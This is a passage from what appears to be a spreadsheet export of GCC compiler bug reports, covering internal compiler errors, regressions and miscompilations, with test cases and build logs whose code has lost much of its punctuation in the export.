System: FreeBSD c-67-168-59-70.client.comcast.net 5.2-CURRENT FreeBSD 5.2-CURRENT #2: Sat Apr 24 10:33:08 PDT 2004 kargl@c-67-168-59-70.client.comcast.net:/usr/obj/usr/src/sys/HOTRATS i386
host: i386-unknown-freebsd5.2
build: i386-unknown-freebsd5.2
target: i386-unknown-freebsd5.2
configured with: ../gcc/configure --prefix=/home/kargl/gcc/work --disable-libmudflap --enable-languages=cf95 --with-gmp=/usr/local
How-To-Repeat:
	See above.</t>
  </si>
  <si>
    <t>Tobias.Schlueter</t>
  </si>
  <si>
    <t>GCC-17044</t>
  </si>
  <si>
    <t>[4.0 Regression] libgcc2.c:169: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>./xgcc -B./ -B/opt/gnu64/gcc/gcc-3.5.0/hppa64-hp-hpux11.11/bin/ -isystem /opt/gn
u64/gcc/gcc-3.5.0/hppa64-hp-hpux11.11/include -isystem /opt/gnu64/gcc/gcc-3.5.0/
hppa64-hp-hpux11.11/sys-include -L/xxx/gnu/gcc-3.3/objdir/gcc/../ld -O2  -DIN_GC
C    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-sty
le-definition  -isystem ./include  -fPIC -Dpa64=1 -DELF=1 -mlong-calls -g -DHAVE
_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I../../gcc/gcc -I.
./../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include -I..
/../gcc/gcc/../libbanshee/libcompat -I../../gcc/gcc/../libbanshee -I../../gcc/gc
c/../libbanshee/points-to  -DL_absvsi2 -c ../../gcc/gcc/libgcc2.c -o libgcc/./_a
bsvsi2.o
../../gcc/gcc/libgcc2.c: In function `__absvsi2':
../../gcc/gcc/libgcc2.c:169: internal compiler error: Segmentation fault
This problem appears to have been introduced by a series of changes by Paolo 
Bonzini on 2004-08-09.  It appears this change removed active code:
2004-08-09  Paolo Bonzini  
        * expr.c (var_rtx): Remove.
        (expand_expr_real_1) &lt;LOOP_EXPR EXIT_EXPR
        LABELED_BLOCK_EXPR EXIT_BLOCK_EXPR TRUTH_ANDIF_EXPR
        TRUTH_ORIF_EXPR COMPOUND_EXPR CONJ_EXPR INIT_EXPR&gt;:
        Abort.
        (expand_expr_real_1) : Remove most special cases.
        * optabs.c (emit_clr_insn emit_0_to_1_insn): Remove.
        * optabs.h (emit_clr_insn emit_0_to_1_insn): Remove.
After this change things failed as follows:
stage1/xgcc -Bstage1/ -B/opt/gnu64/gcc/gcc-3.5.0/hppa64-hp-hpux11.11/bin/   -g -
O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes
-pedantic -Wno-long-long -Wno-variadic-macros -Wold-style-definition -Werror -fn
o-common   -DHAVE_CONFIG_H -DGENERATOR_FILE  -o genmodes \
 genmodes.o errors.o ../libiberty/libiberty.a
./genmodes -h &gt; tmp-modes.h
./genmodes: machmode.def:187: duplicate definition of mode TC
./genmodes: config/pa/pa-modes.def:28: previous definition here
./genmodes: machmode.def:187: duplicate definition of mode DC
./genmodes: machmode.def:150: previous definition here
./genmodes: machmode.def:150: (BLK) field component must not be set
./genmodes: config/pa/pa-modes.def:28: (CCFP) field component must not be set
After this change things are broken:
2004-08-09  Paolo Bonzini  
        * expr.c (expand_expr_real_1): Add back code that was not dead.
The problem seems like a garbage collection issue (i.e. we seem to be
freeing a page twice).  Thus it might be the following change is the
real culprit:
2004-08-09  Geoffrey Keating  
        * ggc-common.c (ggc_rlimit_bound): Don't check RSS limit.
        Check DATA limit only if there's no AS limit.  Ignore insanely
        low DATA limits.
        (ggc_min_heapsize_heuristic): Don't divide AS or RSS limits by 8
        but take care that the AS limit isn't overrun.
        * doc/invoke.texi: Update documentation of min-heapsize parameter.</t>
  </si>
  <si>
    <t>GCC-58941</t>
  </si>
  <si>
    <t>[4.7 Regression] value modification on zero-length array optimized away</t>
  </si>
  <si>
    <t>Created attachment 31122
preprocessed example source file
Hello
on mips32 with gcc4.6.3 I get unexpected results when writing to a buffer via a pointer to a zero-sized array. 
Below is an example to produce the error.
Find additional info from gcc further below.
Thanks Thomas
#include 
#include 
typedef struct {
    int msgLength
    unsigned char data[1000]
} SMsg
typedef struct {
    int dummy
    int d[0]  // using d[] would fix it
} SData
int condition = 3
void checkData( SMsg* pMsg )
void runBug( void )
{
    SMsg msg // generic message
    SData *pData = (SData*)(msg.data) // pointer to specific payload
    unsigned int i = 0 // no bug with signed int
    for ( i = 0 i &lt; 1 i++ ) // bug does not appear without this loop
    {
        pData-&gt;d[i] = 0
        if(condition &amp; 1)
        {    
            pData-&gt;d[i] |= 0x55
            // d[0] is now 0x55
        }
        if(condition &amp; 2)
        {    
            pData-&gt;d[i] |= 0xaa
            // d[0] should now be 0xff but is 0xaa
        }
    }
    checkData( 
}
void checkData( SMsg* pMsg )
{
    SData *pData = (SData*)(pMsg-&gt;data)
    if (pData-&gt;d[0] != 0xff)
    {
        printf(ERROR d[0]=0x%x but should be 0x%x|0x%x\n 
                (unsigned int)pData-&gt;d[0] 0x55 0xaa )
        exit(255)
    }
}
int main( void )
{
    runBug()
    return 0
}
--------------------------------------------------------------
/tmp/tlc/usr/bin/mips-linux-gcc -v -fno-strict-aliasing -O2 -Wall -Wextra -g -fwrapv -save-temps  -o test_gccbug test.c
Using built-in specs.
COLLECT_GCC=/tmp/tlc/usr/bin/mips-linux-gcc
COLLECT_LTO_WRAPPER=/tmp/tlc/usr/bin/../libexec/gcc/mips-buildroot-linux-uclibc/4.6.3/lto-wrapper
Target: mips-buildroot-linux-uclibc
Configured with: /vol/cm/perforce/workspace/tmoschca_luzifer_buildroot/bld_mips32/buildroot-2013.02/output/toolchain/gcc-4.6.3/configure --prefix=/vol/cm/perforce/workspace/tmoschca_luzifer_buildroot/bld_mips32/buildroot-2013.02/output/host/usr --build=x86_64-unknown-linux-gnu --host=x86_64-unknown-linux-gnu --target=mips-buildroot-linux-uclibc --enable-languages=cc++ --with-sysroot=/vol/cm/perforce/workspace/tmoschca_luzifer_buildroot/bld_mips32/buildroot-2013.02/output/host/usr/mips-buildroot-linux-uclibc/sysroot --with-build-time-tools=/vol/cm/perforce/workspace/tmoschca_luzifer_buildroot/bld_mips32/buildroot-2013.02/output/host/usr/mips-buildroot-linux-uclibc/bin --disable-__cxa_atexit --enable-target-optspace --disable-libgomp --with-gnu-ld --disable-libssp --disable-multilib --enable-tls --enable-shared --with-gmp=/vol/cm/perforce/workspace/tmoschca_luzifer_buildroot/bld_mips32/buildroot-2013.02/output/host/usr --with-mpfr=/vol/cm/perforce/workspace/tmoschca_luzifer_buildroot/bld_mips32/buildroot-2013.02/output/host/usr --with-mpc=/vol/cm/perforce/workspace/tmoschca_luzifer_buildroot/bld_mips32/buildroot-2013.02/output/host/usr --disable-nls --enable-threads --disable-decimal-float --with-float=soft --with-abi=32 --with-tune=mips32 --with-pkgversion='Buildroot 2013.02' --with-bugurl=http://bugs.buildroot.net/
Thread model: posix
gcc version 4.6.3 (Buildroot 2013.02)
COLLECT_GCC_OPTIONS='-v' '-fno-strict-aliasing' '-O2' '-Wall' '-Wextra' '-g' '-fwrapv' '-save-temps' '-o' 'test_gccbug' '-mtune=mips32' '-mabi=32' '-msoft-float' '-mllsc' '-mno-synci' '-mno-shared'
 /tmp/tlc/usr/bin/../libexec/gcc/mips-buildroot-linux-uclibc/4.6.3/cc1 -E -quiet -v -iprefix /tmp/tlc/usr/bin/../lib/gcc/mips-buildroot-linux-uclibc/4.6.3/ -isysroot /tmp/tlc/usr/bin/../mips-buildroot-linux-uclibc/sysroot test.c -mtune=mips32 -mabi=32 -msoft-float -mllsc -mno-synci -mno-shared -Wall -Wextra -fno-strict-aliasing -fwrapv -g -fworking-directory -O2 -fpch-preprocess -o test.i
ignoring duplicate directory /tmp/tlc/usr/bin/../lib/gcc/../../lib/gcc/mips-buildroot-linux-uclibc/4.6.3/include
ignoring nonexistent directory /tmp/tlc/usr/bin/../mips-buildroot-linux-uclibc/sysroot/usr/local/include
ignoring duplicate directory /tmp/tlc/usr/bin/../lib/gcc/../../lib/gcc/mips-buildroot-linux-uclibc/4.6.3/include-fixed
ignoring duplicate directory /tmp/tlc/usr/bin/../lib/gcc/../../lib/gcc/mips-buildroot-linux-uclibc/4.6.3/../../../../mips-buildroot-linux-uclibc/include
#include ... search starts here:
#include  search starts here:
 /tmp/tlc/usr/bin/../lib/gcc/mips-buildroot-linux-uclibc/4.6.3/include
 /tmp/tlc/usr/bin/../lib/gcc/mips-buildroot-linux-uclibc/4.6.3/include-fixed
 /tmp/tlc/usr/bin/../lib/gcc/mips-buildroot-linux-uclibc/4.6.3/../../../../mips-buildroot-linux-uclibc/include
 /tmp/tlc/usr/bin/../mips-buildroot-linux-uclibc/sysroot/usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-fno-strict-aliasing' '-O2' '-Wall' '-Wextra' '-g' '-fwrapv' '-save-temps' '-o' 'test_gccbug' '-mtune=mips32' '-mabi=32' '-msoft-float' '-mllsc' '-mno-synci' '-mno-shared'
 /tmp/tlc/usr/bin/../libexec/gcc/mips-buildroot-linux-uclibc/4.6.3/cc1 -fpreprocessed test.i -quiet -dumpbase test.c -mtune=mips32 -mabi=32 -msoft-float -mllsc -mno-synci -mno-shared -auxbase test -g -O2 -Wall -Wextra -version -fno-strict-aliasing -fwrapv -o test.s
GNU C (Buildroot 2013.02) version 4.6.3 (mips-buildroot-linux-uclibc)
        compiled by GNU C version 4.1.2 20080704 (Red Hat 4.1.2-52) GMP version 5.1.0 MPFR version 3.1.1-p2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C (Buildroot 2013.02) version 4.6.3 (mips-buildroot-linux-uclibc)
        compiled by GNU C version 4.1.2 20080704 (Red Hat 4.1.2-52) GMP version 5.1.0 MPFR version 3.1.1-p2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 5822c094c058915fedc3c193375772d1
COLLECT_GCC_OPTIONS='-v' '-fno-strict-aliasing' '-O2' '-Wall' '-Wextra' '-g' '-fwrapv' '-save-temps' '-o' 'test_gccbug' '-mtune=mips32' '-mabi=32' '-msoft-float' '-mllsc' '-mno-synci' '-mno-shared'
 /tmp/tlc/usr/bin/../lib/gcc/mips-buildroot-linux-uclibc/4.6.3/../../../../mips-buildroot-linux-uclibc/bin/as -EB -O2 -g -no-mdebug -mabi=32 -mno-shared -mtune=mips32 -KPIC -o test.o test.s
COMPILER_PATH=/tmp/tlc/usr/bin/../libexec/gcc/mips-buildroot-linux-uclibc/4.6.3/:/tmp/tlc/usr/bin/../libexec/gcc/:/tmp/tlc/usr/bin/../lib/gcc/mips-buildroot-linux-uclibc/4.6.3/../../../../mips-buildroot-linux-uclibc/bin/
LIBRARY_PATH=/tmp/tlc/usr/bin/../lib/gcc/mips-buildroot-linux-uclibc/4.6.3/:/tmp/tlc/usr/bin/../lib/gcc/:/tmp/tlc/usr/bin/../lib/gcc/mips-buildroot-linux-uclibc/4.6.3/../../../../mips-buildroot-linux-uclibc/lib/:/tmp/tlc/usr/bin/../mips-buildroot-linux-uclibc/sysroot/lib/:/tmp/tlc/usr/bin/../mips-buildroot-linux-uclibc/sysroot/usr/lib/
COLLECT_GCC_OPTIONS='-v' '-fno-strict-aliasing' '-O2' '-Wall' '-Wextra' '-g' '-fwrapv' '-save-temps' '-o' 'test_gccbug' '-mtune=mips32' '-mabi=32' '-msoft-float' '-mllsc' '-mno-synci' '-mno-shared'
 /tmp/tlc/usr/bin/../libexec/gcc/mips-buildroot-linux-uclibc/4.6.3/collect2 --sysroot=/tmp/tlc/usr/bin/../mips-buildroot-linux-uclibc/sysroot --eh-frame-hdr -EB -dynamic-linker /lib/ld-uClibc.so.0 -o test_gccbug /tmp/tlc/usr/bin/../mips-buildroot-linux-uclibc/sysroot/usr/lib/crt1.o /tmp/tlc/usr/bin/../mips-buildroot-linux-uclibc/sysroot/usr/lib/crti.o /tmp/tlc/usr/bin/../lib/gcc/mips-buildroot-linux-uclibc/4.6.3/crtbegin.o -L/tmp/tlc/usr/bin/../lib/gcc/mips-buildroot-linux-uclibc/4.6.3 -L/tmp/tlc/usr/bin/../lib/gcc -L/tmp/tlc/usr/bin/../lib/gcc/mips-buildroot-linux-uclibc/4.6.3/../../../../mips-buildroot-linux-uclibc/lib -L/tmp/tlc/usr/bin/../mips-buildroot-linux-uclibc/sysroot/lib -L/tmp/tlc/usr/bin/../mips-buildroot-linux-uclibc/sysroot/usr/lib test.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /tmp/tlc/usr/bin/../lib/gcc/mips-buildroot-linux-uclibc/4.6.3/crtend.o /tmp/tlc/usr/bin/../mips-buildroot-linux-uclibc/sysroot/usr/lib/crtn.o</t>
  </si>
  <si>
    <t>thomas.moschcau</t>
  </si>
  <si>
    <t>GCC-25185</t>
  </si>
  <si>
    <t>deep typedef substitution in error message</t>
  </si>
  <si>
    <t>The enclosed produces the following as part of the error backtrace:
../../../../boost/sequence/make_range.hpp:60:   instantiated from 'boost::sequence::range_::range::type&gt; boost::sequence::detail::range_maker::operator()...
note boost::result_of::type which is a typedef name.  GCC should show a canonical type name here.</t>
  </si>
  <si>
    <t>GCC-5282</t>
  </si>
  <si>
    <t>.so exception handler works in 3.0.2 not 3.0.3</t>
  </si>
  <si>
    <t>Simple test program works in 3.0.2 not in 3.0.3.
A simple try { throw Object() }catch{Object e} fails.
code and make targets in How-To-Repeat
tuxmodule.h (attached) is required to build (and is from the 
redhat (Ingo Molnar) Tux HTTP server package.
Release:
gcc version 3.0.3
Environment:
Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.0.3/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --datadir=/usr/share/gcc-3.0.3 --enable-shared --enable-threads=posix --disable-checking --enable-long-long --enable-cstdio=stdio --enable-clocale=generic --enable-languages=cc++f77objcjava --program-suffix=-3.0.3 --enable-objc-gc --host=i586-mandrake-linux-gnu
Thread model: posix
How-To-Repeat:
******* Make targets ********
bugLoad: bugLoad.c BugLib.tux.so
    ${GCC} -rdynamic -ldl bugLoad.c -o bugLoad
BugLib.o: BugLib.cpp
    ${CC} ${RELEASE_CPPFLAGS} -c BugLib.cpp
BugLib.tux.so: BugLib.o
    ${CC} ${LINK} -O2 -Wall -D_REENTRANT -shared -o $@ BugLib.o -lstdc++ -lgcc_s
    chmod a-x $@
****** bugLoad.c (./bugLoad shows bug) ********
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
//#include 
int main(int argc char** argv) {
        void* handle
        void (*mod_init) (void)
        char libname[] = ./BugLib.tux.so
        handle = dlopen (libname RTLD_LAZY)
        printf (handle: %p\n handle)
        if (!handle) {
                printf(%s: dlopen() handle missing dlerror())
        }
        mod_init = dlsym(handle TUXAPI_init)
        if (!mod_init) {
                printf(%s: TUXAPI_init() function missing strerror(errno))
        }
        printf (TUXAPI_init: %p\n mod_init)
        if(mod_init)
                mod_init()
}
******* BugLib.cpp (shows exception bug requires Tux) ***
extern C {
        #include tuxmodule.h
        void TUXAPI_init()
        int TUXAPI_handle_events (user_req_t *req)
}
#include syslog.h
#include TestException.h
int TUXAPI_handle_events (user_req_t *req) {
        return TUX_RETURN_USERSPACE_REQUEST
}
//TUXAPI_handle_events
// 1. open syslog
// 2.
void TUXAPI_init() {
        openlog(BugLib LOG_PID | LOG_CONS | LOG_NDELAY LOG_DAEMON)
        syslog(LOG_INFO TUXAPI_init())
        try {
                throw TestException(test123)
                return
        } catch(TestException e) {
                // This never happens
                syslog(LOG_INFO Success)
        }
}
******* TestException.h ********
#ifndef _EXCEPTION_H
#define _EXCEPTION_H
#include 
class TestException {
protected:
        char msg[1024]
public:
        TestException(const char *errorMessage) {
                strcpy(msg errorMessage)
        }
}
#endif</t>
  </si>
  <si>
    <t>swansma</t>
  </si>
  <si>
    <t>GCC-35694</t>
  </si>
  <si>
    <t>Error about bad function argument isn't issued on the line of the argument but on the line where function ends</t>
  </si>
  <si>
    <t>int i(int j int *k)
void f() {
  i(
    0
    1 /*&lt;--- here the error should be issued*/
  ) /*&lt;--- here the error is issued*/
}</t>
  </si>
  <si>
    <t>GCC-65296</t>
  </si>
  <si>
    <t>[avr] fix various issues with specs file generation</t>
  </si>
  <si>
    <t>Fix various problems like:
Fix wrong function parameter types fix build warnings handle -march= in DRIVER_SELF_SPEC fix non-existing %-code add avr-libc awareness as of PR54461 do not use avr-libc features if configured with --with-avrlibc=no code clean-up remove dead files code and macros ...</t>
  </si>
  <si>
    <t>GCC-84010</t>
  </si>
  <si>
    <t>problematic TLS code generation on 64-bit SPARC</t>
  </si>
  <si>
    <t>Created attachment 43224
preprocessed input and assembly output
Seen in top-of-tree qemu:
        lduw    [%fp+1823] %g1
...
        ldx     [%l7 + %g1] %g1 %tie_ldx(tcg_ctx)
...
        ldx     [%g7+%g1] %o1
Linker relaxation of R_SPARC_TLS_IE_LDX requires the input to be the
output of R_SPARC_TLS_IE_HI/LO.  However the tie_ld64 pattern uses
an SImode input.  This led to spill/fill that dropped the sign-extension
of the value.
In addition to fixing the mode we should think about letting reload
reconstitute the value -- it's just sethi+or pair.
command-line:
cc -I/home/rth/qemu/bld/sparc64-softmmu/../target/sparc -Itarget/sparc -I/home/rth/qemu/qemu/tcg -I/home/rth/qemu/qemu/tcg/sparc -I/home/rth/qemu/qemu/linux-headers -I/home/rth/qemu/bld/linux-headers -I. -I/home/rth/qemu/qemu -I/home/rth/qemu/qemu/accel/tcg -I/home/rth/qemu/qemu/include -I/usr/include/pixman-1 -I/home/rth/qemu/qemu/dtc/libfdt -Werror -pthread -I/usr/include/glib-2.0 -I/usr/lib/sparc64-linux-gnu/glib-2.0/include -m64 -mcpu=ultrasparc -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -Wstrict-prototypes -Wredundant-decls -Wall -Wundef -Wwrite-strings -Wmissing-prototypes -fno-strict-aliasing -fno-common -fwrapv  -Wexpansion-to-defined -Wendif-labels -Wno-shift-negative-value -Wno-missing-include-dirs -Wempty-body -Wnested-externs -Wformat-security -Wformat-y2k -Winit-self -Wignored-qualifiers -Wold-style-declaration -Wold-style-definition -Wtype-limits -fstack-protector-strong -I/home/rth/qemu/qemu/capstone/include  -I../linux-headers -I.. -I/home/rth/qemu/qemu/target/sparc -DNEED_CPU_H -I/home/rth/qemu/qemu/include  -MMD -MP -MT target/sparc/translate.o -MF target/sparc/translate.d -O2 -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 -g   -c -o target/sparc/translate.o /home/rth/qemu/qemu/target/sparc/translate.c --save-temps</t>
  </si>
  <si>
    <t>GCC-71084</t>
  </si>
  <si>
    <t>[7 Regression] ICE in compute_dominance_frontiers_1 (cfganal.c:1302)</t>
  </si>
  <si>
    <t>Hi.
Current trunk produces ICE for the following code snippet:
enum {
  GIMP_RGB_IMAGE
  GIMP_RGBA_IMAGE
  GIMP_GRAY_IMAGE
  GIMP_GRAYA_IMAGE
  GIMP_INDEXED_IMAGE
} run_i
run_height
fn1() {
  int type width
  if (_setjmp())
    switch (type) {
    case GIMP_RGB_IMAGE:
      babl_format()
    case GIMP_RGBA_IMAGE:
    case GIMP_GRAY_IMAGE:
      babl_format()
    case GIMP_GRAYA_IMAGE:
    case GIMP_INDEXED_IMAGE:
      gimp_drawable_get_format()
    }
  for ( run_height)
    for ( run_i &lt; fn1 ++run_i)
      for ( width)
}
$ gcc tc.i -O2 -c
tc.i:26:1: internal compiler error: Segmentation fault
 }
 ^
0xa41fcf crash_signal
	../../gcc/toplev.c:333
0x6fecf5 compute_dominance_frontiers_1
	../../gcc/cfganal.c:1302
0x6fecf5 compute_dominance_frontiers(bitmap_head*)
	../../gcc/cfganal.c:1319
0x75b47d df_md_local_compute
	../../gcc/df-problems.c:4543
0x753ca1 df_analyze_problem(dataflow* bitmap_head* int* int)
	../../gcc/df-core.c:1174
0x753dcc df_analyze_1
	../../gcc/df-core.c:1229
0xf9d2f4 build_single_def_use_links
	../../gcc/fwprop.c:283
0xf9d2f4 fwprop_init
	../../gcc/fwprop.c:1423
0xf9d835 fwprop_addr
	../../gcc/fwprop.c:1529
0xf9d835 execute
	../../gcc/fwprop.c:1572
Thanks
Martin</t>
  </si>
  <si>
    <t>GCC-47728</t>
  </si>
  <si>
    <t>[OOP] ICE on invalid CLASS declaration</t>
  </si>
  <si>
    <t>The following program produces an internal compiler error:
program test_objects
   implicit none
   type abstract :: shape
   end type
   type extends(shape) :: rectangle
       real :: width height
   end type
   class(shape) dimension(2) :: object
   object(1) = rectangle( 1.0 2.0 )
end program test_objects
There is no indication as to what is wrong with the program
(as Janus who reduced my original program to this minimal one remarks:
there are at least two)</t>
  </si>
  <si>
    <t>arjen.markus</t>
  </si>
  <si>
    <t>GCC-68638</t>
  </si>
  <si>
    <t>[6 Regression] ICE in linemap_macro_map_lookup</t>
  </si>
  <si>
    <t>The following test case triggers an ICE in linemap_macro_map_lookup at libcpp/line-map.c:991 with yesterday's top of trunk.  The test case compiles fine with GCC 5.1 so this is a regression.
$ cat line-map-ice.c &amp;&amp; /build/gcc-trunk-svn/gcc/xgcc -B /build/gcc-trunk-svn/gcc -O2 -S -Wall -fno-diagnostics-show-caret line-map-ice.c
typedef union tree_node *tree
struct ht_identifier {
  const unsigned char *str
}
struct tree_identifier {
  struct ht_identifier id
}
union tree_node {
  struct tree_identifier identifier
}
static int foo (void) {
  tree val
  return mep_pragma_lex (
}
void bar (void) {
  tree val = 0
  if (__extension__ ({val})-&gt;identifier.id.str == 0) foo ()
}
line-map-ice.c: In function â€˜fooâ€™:
line-map-ice.c:17:10: warning: implicit declaration of function â€˜mep_pragma_lexâ€™ [-Wimplicit-function-declaration]
line-map-ice.c: In function â€˜barâ€™:
line-map-ice.c:20:6: internal compiler error: in linemap_macro_map_lookup at libcpp/line-map.c:991
0x1795063 linemap_macro_map_lookup
	/home/msebor/scm/fsf/gcc-svn/libcpp/line-map.c:991
0x1794e4e linemap_lookup(line_maps* unsigned int)
	/home/msebor/scm/fsf/gcc-svn/libcpp/line-map.c:925
0x1795fad linemap_unwind_to_first_non_reserved_loc(line_maps* unsigned int line_map const**)
	/home/msebor/scm/fsf/gcc-svn/libcpp/line-map.c:1629
0x1774164 expand_location_1
	/home/msebor/scm/fsf/gcc-svn/gcc/input.c:159
0x177525d expand_location_to_spelling_point(unsigned int)
	/home/msebor/scm/fsf/gcc-svn/gcc/input.c:751
0x1775283 linemap_client_expand_location_to_spelling_point(unsigned int)
	/home/msebor/scm/fsf/gcc-svn/gcc/input.c:766
0x1796d6c rich_location::add_range(unsigned int unsigned int bool)
	/home/msebor/scm/fsf/gcc-svn/libcpp/line-map.c:2011
0x1796e44 rich_location::add_range(source_range bool)
	/home/msebor/scm/fsf/gcc-svn/libcpp/line-map.c:2024
0x1796b7f rich_location::rich_location(line_maps* unsigned int)
	/home/msebor/scm/fsf/gcc-svn/libcpp/line-map.c:1961
0x176d9ca warning_at(unsigned int int char const* ...)
	/home/msebor/scm/fsf/gcc-svn/gcc/diagnostic.c:1024
0x1653666 find_explicit_erroneous_behaviour
	/home/msebor/scm/fsf/gcc-svn/gcc/gimple-ssa-isolate-paths.c:400
0x16538ef gimple_ssa_isolate_erroneous_paths
	/home/msebor/scm/fsf/gcc-svn/gcc/gimple-ssa-isolate-paths.c:505
0x16539e2 execute
	/home/msebor/scm/fsf/gcc-svn/gcc/gimple-ssa-isolate-paths.c:556
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-3049</t>
  </si>
  <si>
    <t>Conditional compilation using #if A==B broken on i386 Red Hat 7.0.</t>
  </si>
  <si>
    <t>Specifically code that is conditionally compiled using
#if BYTE_ORDER == BIG_ENDIAN
// stuff
#endif
#if BYTE_ORDER == LITTLE_ENDIAN || BYTE_ORDER == PDP_ENDIAN
// stuff
#endif
results in both sections of code getting processed on Red Hat 7.0 if _XOPEN_SOURCE is defined.  The problem does not occur if _XOPEN_SOURCE is not defined.  The attached program reproduces this problem.
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
output of uname -a:
Linux sunflower 2.2.16-22smp #1 SMP Tue Aug 22 16:39:21 EDT 2000 i686 unknown
How-To-Repeat:
Compile the attached program with g++ 2.96 20000731 on Red Hat 7.0 PC with the following command:
g++ -D_XOPEN_SOURCE -o t t.cpp
Execute it.  The output will be
big endian
little endian or PDP endian
(i.e. both sections of code are compiled instead of only the LITTLE_ENDIAN section).
As you might expect this completely prevents any code that includes  from being able to compile.</t>
  </si>
  <si>
    <t>behanna</t>
  </si>
  <si>
    <t>GCC-69893</t>
  </si>
  <si>
    <t xml:space="preserve">[6 Regression] Conflicting declarations in  and </t>
  </si>
  <si>
    <t>The following program used to work some time ago (with GCC 20160118) but with current version it is rejected:
$ cat test.cc
#include 
#include 
$ cc1plus test.cc
In file included from /opt/gcc-6.0.0/include/c++/6.0.0/tr1/random:46:0
                 from /opt/gcc-6.0.0/include/c++/6.0.0/parallel/random_number.h:36
                 from /opt/gcc-6.0.0/include/c++/6.0.0/parallel/partition.h:38
                 from /opt/gcc-6.0.0/include/c++/6.0.0/parallel/quicksort.h:36
                 from /opt/gcc-6.0.0/include/c++/6.0.0/parallel/sort.h:48
                 from /opt/gcc-6.0.0/include/c++/6.0.0/parallel/algo.h:45
                 from /opt/gcc-6.0.0/include/c++/6.0.0/parallel/algorithm:37
                 from test.cc:2:
/opt/gcc-6.0.0/include/c++/6.0.0/tr1/cmath: In function 'float std::tr1::acosh(float)':
/opt/gcc-6.0.0/include/c++/6.0.0/tr1/cmath:424:18: error: 'float std::tr1::acosh(float)' conflicts with a previous declaration
   acosh(float __x)
                  ^
In file included from /opt/gcc-6.0.0/include/c++/6.0.0/math.h:36:0
                 from test.cc:1:
/opt/gcc-6.0.0/include/c++/6.0.0/cmath:1224:3: note: previous declaration 'constexpr float std::acosh(float)'
   acosh(float __x)
   ^~~~~
...
(more errors follow)</t>
  </si>
  <si>
    <t>miyuki</t>
  </si>
  <si>
    <t>GCC-48410</t>
  </si>
  <si>
    <t>weird installation dir</t>
  </si>
  <si>
    <t>When cross-building gccgo (gcc-4.6.0) for *-rtems* targets 
libgo's *.gox files end up installed under a what I assume to be a bogus directory:
e.g.:
/opt/rtems-4.11/lib/gcc/i386-rtems4.11/4.6.0/mpentium/go/4.6.0/i386-rtems4.11/archive/tar.gox
${prefix}/lib/gcc/${target}/${gcc_version}/${multisubdir}/go/${gcc_version}/${target}/...
At least I would expect them to end up under
${prefix}/lib/gcc/${target}/${gcc_version}/${multisubdir}/go
(This would match how other languages support targets files are installed 
e.g. libstdc++)
FYI: I am configuring gcc with --enable-version-specific-runtime-libs
I would not want to exclude this issue to be related to this option 
because other languages had similar issues related to this option in the past.</t>
  </si>
  <si>
    <t>corsepiu</t>
  </si>
  <si>
    <t>GCC-11715</t>
  </si>
  <si>
    <t>Error with template keyword in a non-dependent type</t>
  </si>
  <si>
    <t>The following valid code (from PR 10398) is rejected
by g++ since at least gcc 2.95.x:
----------------------------------------------
struct A
{
    template  struct B {}
}
template  struct C
{
    C() { A::template B b }
}
C c
----------------------------------------------
The error message is:
bug.cc: In constructor `C::C()':
bug.cc:8: error: expected `'
bug.cc: In constructor `C::C() [with T = void]':
bug.cc:11:   instantiated from here
bug.cc:8: error: `B' undeclared (first use this function)
bug.cc:8: error: (Each undeclared identifier is reported only once for each 
   function it appears in.)
If one removes the template keyword in line 8 or adds
a typename before A::template the code compiles.</t>
  </si>
  <si>
    <t>GCC-18391</t>
  </si>
  <si>
    <t>internal error: Segmentation fault for valid code segment</t>
  </si>
  <si>
    <t>Try to compile the following code in a cpp file gcc crashes. Working on Redhat 7.2.
#include 
#define b 5
int f
int foobar(int foo int bar = (assert(f&gt;=b) funcPtr)() int foob=some_int)
Reading specs from
/shared/i80386linux/compiler/gcc3.2/linux2.4/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
Configured with: ../configure
--prefix=/user/unicore/i80386linux/compiler/gcc3.2/linux2.4
--enable-languages=cc++ --enable-threads=posix --enable-shared
--enable-__cxa_atexit
Thread model: posix
gcc version 3.2</t>
  </si>
  <si>
    <t>asachdeva</t>
  </si>
  <si>
    <t>GCC-64533</t>
  </si>
  <si>
    <t>[5 Regression] [SH] alloca generates unsafe code</t>
  </si>
  <si>
    <t>The trunk compiler compiles
  void *foo() { return alloca (0x400)}
to
foo:
        mov.l   r14@-r15
        mov     r15r1
        mov     r15r14
        mov.w   .L2r15		(*)
        add     r1r15
        mov     r15r0
        mov     r14r15
        rts
        mov.l   @r15+r14
        .align 1
.L2:
        .short  -1028
with -O2.
r15 has been set -1028 at (*) which isn't always safe.  For example
sh-linux uses the negative stack values for software roll-back and
I've got a few sporadic and unreproducible errors on libjava testsuite
because of this.  I've introduced a splitter which splits rA := rB + N
to rA := N and rA := rA + rB for LRA's register elimination phase.
It should take rA=r15 case into account.  I'm testing the patch below.
--- config/sh/sh.md
+++ config/sh/sh.md
@@ -20619 +206110 @@
  The problem is that LRA expects something like
     (set rA (plus rB (const_int N)))
  to work.  We can do that but we have to split out an additional reg-reg
- copy before the actual add insn.
+ copy before the actual add insn.  Use u constraint for that case to avoid
+ the invalid value in the stack pointer.
